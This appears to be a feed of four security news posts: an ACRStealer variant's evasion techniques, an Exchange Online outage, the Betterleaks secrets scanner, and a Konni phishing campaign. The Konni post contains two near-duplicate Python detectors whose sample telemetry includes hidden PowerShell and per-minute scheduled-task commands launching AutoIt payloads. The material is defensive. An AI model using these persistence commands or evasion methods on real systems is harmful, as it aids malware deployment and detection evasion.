The latest findings come from G DATA, which analyzed samples delivered through HijackLoader and tied to the long-running PiviGames lure infrastructure. According to the researchers, ACRStealer arrives as the final payload after victims are pushed through malicious links and redirected to archives that pose as legitimate installers. G DATA said the same infrastructure has also delivered LummaStealer, which suggests the operators can rotate payloads while keeping the rest of the distribution chain intact.

Proofpoint had already linked Amatera Stealer to ACRStealer in 2025, describing it as a rebranded and actively maintained information stealer sold as malware-as-a-service. That earlier research highlighted improved evasion and the use of NTSockets and direct WoW64 syscalls. G DATA’s newer report builds on that picture and shows the malware’s continued development.

Dynamic API Resolution (Source – G Data)

What changed in this ACRStealer variant

G DATA says this version resolves functions by locating ntdll.dll through the Process Environment Block and parsing the Export Address Table, rather than leaning on the higher-level Win32 APIs that many security tools watch more closely. The malware then executes syscalls through the WoW64 transition gate, a method that can bypass user-mode hooks used by EDR products.

For network activity, the malware avoids standard Winsock APIs and instead builds an AFD endpoint path and opens it with NtCreateFile. After connecting, it completes a TLS handshake through Microsoft’s SSPI framework. G DATA said this variant used playtogga[.]com in the HTTP Host header and communicated with 157[.]180[.]40[.]106, which helped the traffic blend in with normal encrypted web sessions.

The stealer also broadens its data theft profile. Researchers said it targets browser credentials, cookies, login data, and Steam-related information, then writes stolen data to a hardcoded text file before exfiltration. The report also describes system fingerprinting that collects details such as machine GUID, username, architecture, locale, and build time.

Building AFD Endpoint with Object_Attribute Struct (Source – G Data)

Why defenders should pay attention

This is not just another browser credential stealer. The technical changes show an effort to reduce visibility at both the endpoint and network level. By mixing direct syscalls, AFD-based socket creation, and TLS-wrapped traffic, the malware removes several of the easier signals defenders often use for detection.

The delivery model matters too. G DATA said the PiviGames infection chain remained active into early 2026 and had started serving LummaStealer through a Mega-hosted Setup.exe in some cases. That means defenders cannot focus only on one payload family. They need to watch the loader, redirection chain, and infrastructure behind it.

Building AFDOpenPacketXX with TCP Ipv4 socket (Source – G Data)

Key technical details at a glance

Area                        Reported behavior
Initial delivery            HijackLoader through malicious PiviGames-themed distribution
Evasion                     Direct WoW64 syscalls, dynamic API resolution via ntdll.dll
Network method              AFD endpoint creation with NtCreateFile instead of Winsock
C2 protection               TLS handshake via Microsoft SSPI
Theft targets               Browser data, cookies, login data, Steam credentials, system details
Infrastructure flexibility  Same chain also observed delivering LummaStealer

Indicators and defensive steps

  • Monitor for unusual use of low-level APIs such as NtCreateFile, NtOpenFile, and NtQueryDirectoryFile.
  • Hunt for suspicious AFD-based socket activity that bypasses normal Winsock telemetry.
  • Block or investigate traffic involving 157[.]180[.]40[.]106 and playtogga[.]com where appropriate.
  • Watch for HijackLoader behavior and staged malware delivered through gaming forums, social platforms, and fake software links.
  • Educate users not to open installers from unverified links shared through Discord, Reddit, Steam communities, or file-sharing redirects.

FAQ

What is new in this ACRStealer variant?

Researchers say it adds direct syscall-based evasion, TLS-protected C2 traffic, and continued use in flexible loader-based campaigns.

How does it avoid detection?

It avoids many higher-level Windows APIs and instead uses direct WoW64 syscalls plus AFD-based networking, which can reduce visibility for some security products.

What does it steal?

G DATA said the malware targets browser credentials, cookies, login data, Steam-related information, and system fingerprinting data.

Why is payload switching important?

Because the same delivery chain can push different stealers, defenders need to detect the infrastructure and loader behavior, not just one malware family.

Microsoft investigates Exchange Online mailbox access outage affecting Outlook and web users
https://vpncentral.com/microsoft-investigates-exchange-online-mailbox-access-outage-affecting-outlook-and-web-users/
Tue, 17 Mar 2026 07:49:19 +0000

Microsoft has confirmed an Exchange Online service incident that left some users unable to access their mailboxes through one or more connection methods on March 16. The company later said service was restored, but it is still investigating the underlying cause and plans to share more details in a post-incident report.

The outage affected Exchange Online mailbox access rather than just a single app. According to Microsoft’s incident messaging, impacted methods included Outlook on the web, Outlook desktop, Exchange ActiveSync, and other Exchange Online connection protocols. That means the disruption could hit users across browser, desktop, and mobile access paths.

Microsoft first acknowledged the issue through its Microsoft 365 status channels, saying it was investigating reports of mailbox access failures. Later, the company said telemetry suggested the issue was no longer occurring for affected users, while engineers continued to monitor service health and verify a sustained recovery.

A later update said the problem was tied to supporting network infrastructure. Microsoft said an underlying issue in that infrastructure caused service availability degradation across Exchange Online connection methods. The company has not yet published the full root cause, but it said that explanation will appear in the post-incident report.

For business customers, the incident mattered because Exchange Online sits at the center of daily email and calendar workflows. Even a partial outage can disrupt shared mailboxes, mobile sync, web access, and desktop productivity across departments. Microsoft advises administrators to monitor the Service health page in the Microsoft 365 admin center for incident timelines, impact details, and recovery updates.

What happened

Detail             What Microsoft said
Affected service   Exchange Online
Main issue         Some users could not access their mailbox
Affected methods   Outlook on the web, Outlook desktop, Exchange ActiveSync, and other Exchange Online protocols
Public status      Service restored
Ongoing work       Microsoft is still investigating the full root cause

What IT admins should do now

  • Check Microsoft 365 admin center under Health > Service health for the latest incident notes.
  • Confirm which access paths failed in your tenant, such as Outlook on the web, desktop Outlook, or mobile sync.
  • Tell users whether service has been restored and ask them to retry sign-in before opening new support cases.
  • Record the impact window for internal reporting, SLA tracking, or support review.

Why this outage drew attention

The incident did not appear limited to one app or one client type, which made it more disruptive than a narrow Outlook bug. Reports pointed to problems across multiple Exchange Online connection methods, and separate Microsoft 365 web access issues were also under investigation around the same time, including Office.com and some Copilot web sign-in pages.

Microsoft has already dealt with other Exchange Online disruptions in recent months, including earlier incidents involving mailbox access and client connectivity. That wider pattern will likely keep admins focused on incident response, fallback access methods, and Microsoft’s post-incident findings once the company publishes them.

FAQ

What was the Exchange Online outage about?

Microsoft said some users could not access their Exchange Online mailbox through one or more connection methods.

Was the issue resolved?

Yes. Microsoft later marked the incident as restored, while continuing to investigate the full cause.

Which apps or methods were affected?

Microsoft’s incident details said the impact included Outlook on the web, Outlook desktop, Exchange ActiveSync, and other Exchange Online protocols.

Where should admins look for updates?

Microsoft directs administrators to the Service health section in the Microsoft 365 admin center.

Betterleaks launches as a new open-source secrets scanner for files, directories, and Git repos
https://vpncentral.com/betterleaks-launches-as-a-new-open-source-secrets-scanner-for-files-directories-and-git-repos/
Tue, 17 Mar 2026 07:42:39 +0000

Betterleaks is a new open-source tool that scans files, directories, and Git repositories for leaked secrets such as API keys, tokens, and passwords. The project comes from Zach Rice, the original creator of Gitleaks, and positions itself as a faster drop-in replacement built for modern developer workflows.

Betterleaks looks like a serious new option for teams that already use Gitleaks or want a lightweight scanner for secret exposure. According to the official launch announcement, it keeps compatibility with older Gitleaks CLI options and configs while adding new detection and validation features.

That matters because secret leaks remain one of the easiest ways for attackers to gain access to cloud services, internal tools, and production systems. A scanner that fits into existing pipelines without forcing teams to rebuild workflows can lower friction and speed up adoption.

What Betterleaks is and why it exists

Betterleaks did not appear out of nowhere. In the official announcement, Rice says he built it after losing administrative control over the original Gitleaks repository, which pushed him to start fresh and build what he describes as a better open-source secrets scanner. He also says he joined Aikido Security as Head of Secrets Scanning, while Betterleaks remains open-source and supported by Aikido.

The project launched under the MIT license and focuses on scanning Git repos, files, and input passed through standard input. The GitHub page describes Betterleaks as a tool for detecting secrets like passwords, API keys, and tokens across repositories and files.

What Betterleaks adds over older secrets scanners

The official launch post says Betterleaks ships as a drop-in replacement for Gitleaks, but it does more than keep command compatibility. Aikido says the first release includes token efficiency detection, rule-defined validation, support for default encoding detection, a pure Go architecture, and parallelized Git scanning.

One of the more notable claims involves token efficiency scanning. The launch post says Betterleaks uses a technique based on BPE tokenization rather than standard entropy to identify likely secrets, and it reports a 98.6 percent recall rate for that method.

Validation also looks more flexible. Aikido says Betterleaks uses CEL, or Common Expression Language, to define validation logic, which should make it easier for contributors to add support for new providers without rebuilding deeper parts of the engine.

The project also skips CGO and Hyperscan dependencies. That pure Go approach should make deployment easier in varied environments, especially for teams that want a scanner they can move across developer laptops, CI jobs, and containers with less setup overhead.

Gitleaks Becomes the Most Popular Secrets Scanner on GitHub (source: aikido)

Betterleaks at a glance

Feature        What the official announcement says
Compatibility  Existing Gitleaks CLI options and configs should work
Detection      Uses token efficiency scanning based on BPE tokenization
Validation     Uses CEL-based rule-defined validation
Performance    Adds parallelized Git scanning
Portability    Built in pure Go without CGO or Hyperscan
Data handling  Can detect secrets hidden behind default encoding layers

Source: Aikido Security launch post.

Why this could matter for AI-assisted coding

Aikido explicitly frames Betterleaks as a tool for the agentic era. The launch post says AI coding environments such as Claude Code, Codex, and Cursor often rely on CLI tools to retrieve targeted information efficiently, and Betterleaks can fit into those flows as a scanning utility for generated code or bug bounty workflows.

That angle gives Betterleaks a timely pitch. More teams now use AI tools to write, refactor, and move code quickly. When code moves faster, the risk of accidentally exposing credentials also rises. A secrets scanner that works well in automated and AI-heavy workflows could appeal to both security teams and developers.

Governance and backing

Aikido says Betterleaks remains independent and open-source even though the company sponsors development. The launch post also says the project uses a multi-maintainer model, with contributors who have experience at organizations including Red Hat, Amazon, and RBC.

That shared governance model may help reassure users who worry about project continuity. Open-source security tools often gain trust when maintenance does not depend on a single person.

What comes next

Aikido’s published roadmap for Betterleaks v2 includes broader scanning sources, LLM-assisted secret classification using anonymized data, auto-revocation of exposed credentials through provider APIs, permissions mapping, more performance work, and a flatter CEL-based configuration system with backward compatibility.

Those features are still future-facing, so teams should judge Betterleaks first on what it offers today rather than what may arrive later. Still, the roadmap shows that the project aims to become more than a basic scanner.

Key takeaways

  • Betterleaks is a new open-source secrets scanner from the creator of Gitleaks.
  • It scans files, directories, Git repositories, and stdin for exposed secrets.
  • The project claims drop-in compatibility with existing Gitleaks configs and CLI options.
  • Officially announced features include BPE-based token efficiency detection, CEL-based validation, pure Go portability, and parallel Git scanning.
  • Aikido supports the project, but the scanner remains open-source under the MIT license.

FAQ

What is Betterleaks?

Betterleaks is an open-source secrets scanner that looks for exposed credentials such as passwords, tokens, and API keys in files, directories, Git repositories, and stdin.

Who created Betterleaks?

The project comes from Zach Rice, the original creator of Gitleaks, according to the official launch post.

Can Betterleaks replace Gitleaks?

The official announcement says it is a drop-in replacement, so existing Gitleaks CLI options and configs should continue to work.

Is Betterleaks open-source?

Yes. The project is available on GitHub and uses the MIT license.

What makes Betterleaks different?

Its headline features include token efficiency detection based on BPE tokenization, CEL-based validation rules, pure Go deployment, and parallelized Git scanning.

Konni hackers hijack KakaoTalk accounts to spread malware in multi-stage phishing attacks
https://vpncentral.com/konni-hackers-hijack-kakaotalk-accounts-to-spread-malware-in-multi-stage-phishing-attacks/
Tue, 17 Mar 2026 07:33:12 +0000

A North Korea-linked threat group known as Konni has been caught using a multi-stage phishing campaign that starts with targeted emails and then turns compromised KakaoTalk accounts into malware delivery channels. The campaign, documented by South Korea’s Genians Security Center, used decoy documents, malicious LNK shortcut files, PowerShell, and several remote access trojans to move from one victim to the next.

The most important part of this campaign is what happens after the initial infection. The attackers did not stop at stealing data from the first victim. Genians says they also abused the victim’s KakaoTalk PC session to send malicious files to selected contacts, which made the second wave of attacks look far more trustworthy.

That matters because KakaoTalk remains one of the most widely used messaging platforms in South Korea, so a file that arrives from a known contact can look routine instead of suspicious. In this case, the social engineering appears highly targeted, with lures tied to North Korean human rights themes and recipients whose interests or work made the messages feel plausible.

How the Konni campaign works

According to Genians, the attack began with spear-phishing emails disguised as appointment notices for North Korean human rights lecturers. The messages carried an archive that contained a malicious LNK file dressed up to look like an ordinary document. When the target opened it, the file quietly launched PowerShell in the background and reached out to external infrastructure to pull down more malware.

The attackers then stayed on the infected system long enough to collect documents, user account details, and environment data. After that, they moved into the victim’s KakaoTalk PC application, selected specific contacts, and sent another malicious file disguised as a planning document related to North Korea-themed video content. That turned the original victim into a trusted relay point for the next stage of infection.

Genians says the broader operation deployed several RAT families, including EndRAT, RftRAT, and RemcosRAT, and used distributed command-and-control infrastructure tied to locations including Finland, Japan, and the Netherlands. Public reporting on the campaign also links Konni to Kimsuky or APT37-related activity, though attribution across North Korean clusters often varies by vendor.

Overall Attack Flow (Source – Genians)

Why the LNK file matters

The malicious shortcut file appears to do much more than launch a simple payload. Reporting based on the Genians analysis says the LNK executes a 32-bit PowerShell process through cmd.exe using the SysWOW64 path, which can help it blend in and potentially evade some controls. It also looks for the LNK file by size rather than name, so renaming the file does not break the infection chain.

Researchers say the shortcut then reads a hidden data block from a fixed offset inside the file and decodes it with a one-byte XOR key. The victim sees a decoy PDF, while the real attack continues in the background. The file then deletes itself, downloads a legitimate AutoIt interpreter alongside a malicious compiled AutoIt script, and creates a scheduled task that runs every minute for 365 days to maintain persistence.

That combination makes the attack harder to spot. The victim sees what looks like a normal document, while the malware hides behind common Windows components and long-lived scheduled execution. It also gives the attacker a stable foothold for reconnaissance, data theft, and lateral social engineering through KakaoTalk.

What makes this campaign more dangerous than ordinary phishing

This is not just a one-shot phishing attempt. It is a chained operation that mixes espionage, persistence, and trusted-channel abuse.

  • The first lure arrives by email and looks relevant to the target’s interests.
  • The first-stage file masquerades as a harmless document but launches PowerShell and downloads more tools.
  • The attackers remain on the machine to collect data before pivoting.
  • The victim’s KakaoTalk account becomes a new malware distribution channel.
  • Persistence comes from scheduled tasks and AutoIt-based payloads.

Distribution of Malicious Files via KakaoTalk (Source – Genians)

Key indicators from the campaign

Element           Details
Initial lure      Spear-phishing emails themed around North Korean human rights appointments
Initial payload   Archive containing a malicious LNK file disguised as a document
Execution chain   LNK launches PowerShell through cmd.exe and SysWOW64
Persistence       Scheduled task runs every minute for 365 days
Malware families  EndRAT, RftRAT, and RemcosRAT
Secondary spread  Hijacked KakaoTalk PC sessions used to send malicious files to contacts

What defenders should do now

Organizations that rely on email and chat workflows should treat archive attachments carrying LNK files as high risk, especially when the file icon makes the shortcut look like a document. Security teams should also monitor for unusual process chains in which LNK execution leads to cmd.exe, PowerShell, scheduled task creation, or AutoIt-related activity. These steps follow directly from the behavior described in the Genians-backed reporting.
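The process-chain monitoring suggested above, as an added example that is not Genians' code: it rebuilds parent/child relationships from process-creation events (a constructed sample with assumed field names, not any vendor's schema) and flags explorer.exe spawning cmd.exe that runs PowerShell from the SysWOW64 path, raising confidence when a per-minute scheduled task or an AutoIt interpreter appears beneath it.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Signals taken from the reporting above: PowerShell launched from the 32-bit
# SysWOW64 path, a scheduled task firing every minute, and an AutoIt interpreter.
SYSWOW64_PS = re.compile(r"\\SysWOW64\\WindowsPowerShell\\v1\.0\\powershell\.exe", re.I)
PER_MINUTE_TASK = re.compile(r"/sc\s+minute", re.I)
AUTOIT = re.compile(r"autoit3?\.exe", re.I)


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field names assumed, not a vendor schema)."""
    pid: int
    ppid: int
    image: str      # executable basename
    cmdline: str


@dataclass
class Finding:
    root_pid: int                       # the cmd.exe that started the chain
    chain: List[str]                    # "pid:image" from the top ancestor down
    reasons: List[str] = field(default_factory=list)

    @property
    def high_confidence(self) -> bool:
        # Stage 1 alone is unusual; stage 1 plus persistence/AutoIt is the full pattern.
        return len(self.reasons) > 1


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """ev followed by its parents, stopping at an unknown pid or a cycle."""
    out, seen, cur = [ev], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        out.append(cur)
    return out


def descendants(pid: int, children: Dict[int, List[ProcEvent]]) -> List[ProcEvent]:
    """Every process below pid, in no particular order."""
    out, stack = [], list(children.get(pid, []))
    while stack:
        ev = stack.pop()
        out.append(ev)
        stack.extend(children.get(ev.pid, []))
    return out


def detect_lnk_chain(events: List[ProcEvent]) -> List[Finding]:
    by_pid = {e.pid: e for e in events}
    children: Dict[int, List[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    findings: List[Finding] = []
    for e in events:
        # Stage 1: the shortcut launcher (explorer.exe) spawns cmd.exe, which
        # hands off to the 32-bit PowerShell host.
        if e.image.lower() != "cmd.exe" or not SYSWOW64_PS.search(e.cmdline):
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image.lower() != "explorer.exe":
            continue
        f = Finding(e.pid, [f"{a.pid}:{a.image}" for a in reversed(ancestors(e, by_pid))])
        f.reasons.append("explorer.exe -> cmd.exe launching SysWOW64 powershell.exe")
        # Stage 2: persistence or AutoIt activity anywhere below that cmd.exe.
        for d in descendants(e.pid, children):
            if d.image.lower() == "schtasks.exe" and PER_MINUTE_TASK.search(d.cmdline):
                f.reasons.append(f"pid {d.pid}: schtasks.exe registering a per-minute task")
            if AUTOIT.search(d.image) or AUTOIT.search(d.cmdline):
                f.reasons.append(f"pid {d.pid}: AutoIt interpreter referenced")
        findings.append(f)
    return findings


# Constructed sample telemetry for the demo; not real events from the campaign.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(2001, 1000, "cmd.exe",
              r'cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden'),
    ProcEvent(2002, 2001, "powershell.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden"),
    ProcEvent(2003, 2002, "schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 1 /tn SampleTask /tr "C:\Users\Public\AutoIt3.exe"'),
    ProcEvent(2004, 2002, "AutoIt3.exe", r"C:\Users\Public\AutoIt3.exe script.a3x"),
    # Benign: an admin opens 64-bit PowerShell from the Start menu and lists tasks.
    ProcEvent(3001, 1000, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(3002, 3001, "schtasks.exe", "schtasks.exe /query"),
    # Benign: a batch file run from Explorer.
    ProcEvent(3003, 1000, "cmd.exe", r"cmd.exe /c C:\Tools\build.bat"),
]


def run_sample() -> List[Finding]:
    return detect_lnk_chain(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(" -> ".join(f.chain), "| high confidence:", f.high_confidence)
        for r in f.reasons:
            print("   ", r)
```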

It is also worth watching messaging apps on endpoints, especially when they suddenly begin sending files or messages outside a user’s normal behavior. In this campaign, KakaoTalk was not just incidental software on the victim machine. It became part of the attacker’s distribution mechanism.
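The process-chain monitoring described above can be expressed as a small rule set over process-creation telemetry. The following is an added example written for this article; it is not detection content from Genians or from any vendor. It assumes events shaped like Sysmon Event ID 1 fields (process id, parent id, image path, command line) and all sample events, paths, PIDs and task names are constructed for illustration. It flags three behaviours the reporting describes: Explorer launching cmd.exe which launches PowerShell (the parentage a double-clicked shortcut produces), schtasks.exe creating a minute-interval task, and execution of the AutoIt interpreter or a compiled .a3x script. It also separately notes PowerShell started from the SysWOW64 directory, since the reporting mentions the 32-bit path.

```python
"""Toy detector for the LNK -> cmd.exe -> PowerShell -> scheduled task / AutoIt
chain. Constructed example, not a vendor detection rule. Events resemble Sysmon
Event ID 1 fields; the sample telemetry below is invented for illustration."""
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line of the created process


def _name(image: str) -> str:
    """Lower-cased basename of an image path, e.g. 'powershell.exe'."""
    return PureWindowsPath(image).name.lower()


def find_lnk_powershell_chains(events: List[ProcEvent]) -> List[Tuple[int, int]]:
    """(cmd_pid, powershell_pid) pairs where explorer.exe -> cmd.exe -> powershell.exe.
    A shortcut opened from Explorer whose target is cmd.exe yields this parentage."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits: List[Tuple[int, int]] = []
    for e in events:
        if _name(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _name(parent.image) != "cmd.exe":
            continue
        grandparent = by_pid.get(parent.ppid)
        if grandparent is not None and _name(grandparent.image) == "explorer.exe":
            hits.append((parent.pid, e.pid))
    return hits


def find_wow64_powershell(events: List[ProcEvent]) -> List[int]:
    """PIDs of PowerShell started from the 32-bit SysWOW64 directory."""
    return [e.pid for e in events
            if _name(e.image) == "powershell.exe" and "\\syswow64\\" in e.image.lower()]


def find_minute_scheduled_tasks(events: List[ProcEvent]) -> List[int]:
    """PIDs of schtasks.exe invocations creating a task on a minute schedule."""
    hits: List[int] = []
    for e in events:
        c = e.cmdline.lower()
        if _name(e.image) == "schtasks.exe" and "/create" in c and "/sc minute" in c:
            hits.append(e.pid)
    return hits


def find_autoit_activity(events: List[ProcEvent]) -> List[int]:
    """PIDs that are the AutoIt interpreter or pass a compiled .a3x script."""
    return [e.pid for e in events
            if "autoit" in _name(e.image) or ".a3x" in e.cmdline.lower()]


def analyze(events: List[ProcEvent]) -> dict:
    """Run every rule and return the PIDs each one flagged."""
    return {
        "lnk_chain": find_lnk_powershell_chains(events),
        "wow64_powershell": find_wow64_powershell(events),
        "minute_tasks": find_minute_scheduled_tasks(events),
        "autoit": find_autoit_activity(events),
    }


# Constructed sample telemetry: one malicious chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell.exe -File stage1.ps1"),
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File stage1.ps1"),
    ProcEvent(400, 300, r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /create /sc minute /mo 1 /tn Updater /tr C:\Users\Public\svc.exe"),
    ProcEvent(500, 300, r"C:\Users\Public\AutoIt3.exe", r"AutoIt3.exe C:\Users\Public\run.a3x"),
    ProcEvent(600, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),           # benign shell
    ProcEvent(700, 600, r"C:\Windows\System32\ping.exe", "ping.exe 10.0.0.1"),  # benign child
    ProcEvent(800, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File backup.ps1"),                               # benign, no cmd parent
]


if __name__ == "__main__":
    for rule, pids in analyze(SAMPLE_EVENTS).items():
        print(f"{rule}: {pids}")
```

Each rule is deliberately narrow, so on its own it will produce benign hits in some environments (administrators do create minute tasks); the value comes from several rules firing on one parent-child tree within a short window, which is what the reported chain looks like.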

Extracted Commands from the Malicious LNK File (Source – Genians)

Teams should also review outbound connections to unusual domains and infrastructure tied to known command-and-control operations. Genians-linked reporting says the attackers used globally distributed infrastructure, which can complicate geolocation-based filtering and make the traffic appear less suspicious at first glance.

FAQ

What is Konni APT?

Konni is a North Korea-linked threat group that multiple researchers associate with espionage activity. Recent Genians-linked reporting says it used phishing emails and hijacked KakaoTalk accounts in a new multi-stage campaign.

How did the attack start?

The campaign started with spear-phishing emails carrying an archive that contained a malicious LNK shortcut file disguised as a normal document.

Why was KakaoTalk important in this campaign?

After compromising a victim’s PC, the attackers used the person’s KakaoTalk account to send malicious files to trusted contacts, which made the next wave of attacks more convincing.

What malware did the attackers use?

Public reporting tied to the Genians investigation says the campaign used EndRAT, RftRAT, and RemcosRAT, with payloads delivered through AutoIt-based scripts.

What should security teams look for?

They should look for suspicious archive attachments with LNK files, abnormal PowerShell execution after shortcut launches, scheduled tasks created for persistence, and unusual file-sharing behavior in KakaoTalk or similar desktop messaging apps.

The post Konni hackers hijack KakaoTalk accounts to spread malware in multi-stage phishing attacks appeared first on VPN Central.

